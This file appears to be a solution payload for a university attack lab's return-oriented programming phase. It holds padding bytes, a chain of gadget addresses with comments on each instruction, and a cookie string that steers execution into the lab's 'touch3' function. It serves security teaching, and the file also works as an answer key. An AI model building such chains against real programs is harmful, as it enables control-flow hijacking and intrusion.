55 55 55 55 55 55 55 55     /* padding content */
44 44 44 44 44 44 44 44     /* padding content */
33 33 33 33 33 33 33 33     /* padding content */
22 22 22 22 22 22 22 22     /* padding content */
11 11 11 11 11 11 11 11     /* padding content */
70 1b 40 00 00 00 00 00     /* RA1: 0x401b70 - movq %rsp, %rax */
d6 1a 40 00 00 00 00 00     /* RA2: 0x401ad6 - movq %rax, %rdi */
f4 1a 40 00 00 00 00 00     /* RA3: 0x401af4 - popq %rax */
48 00 00 00 00 00 00 00     /* cookie addr offsets - %rax = $0x48 */
26 1b 40 00 00 00 00 00     /* RA4: 0x401b26 - movl %eax, %edx */
ac 1b 40 00 00 00 00 00     /* RA5: 0x401bac - movl %edx, %ecx */
b3 1b 40 00 00 00 00 00     /* RA6: 0x401bb3 - movl %ecx, %esi */
09 1b 40 00 00 00 00 00     /* RA7: 0x401b09 - lea (%rdi, %rsi, 1), %rax */
d6 1a 40 00 00 00 00 00     /* RA8: 0x401ad6 - movq %rax, %rdi */
32 1a 40 00 00 00 00 00     /* RA: 0x401a32<touch3> */
34 63 39 32 61 65 36 38     /* cookie */
00 00 00 00 00 00 00 00     /* cookie end flag(0x00) */
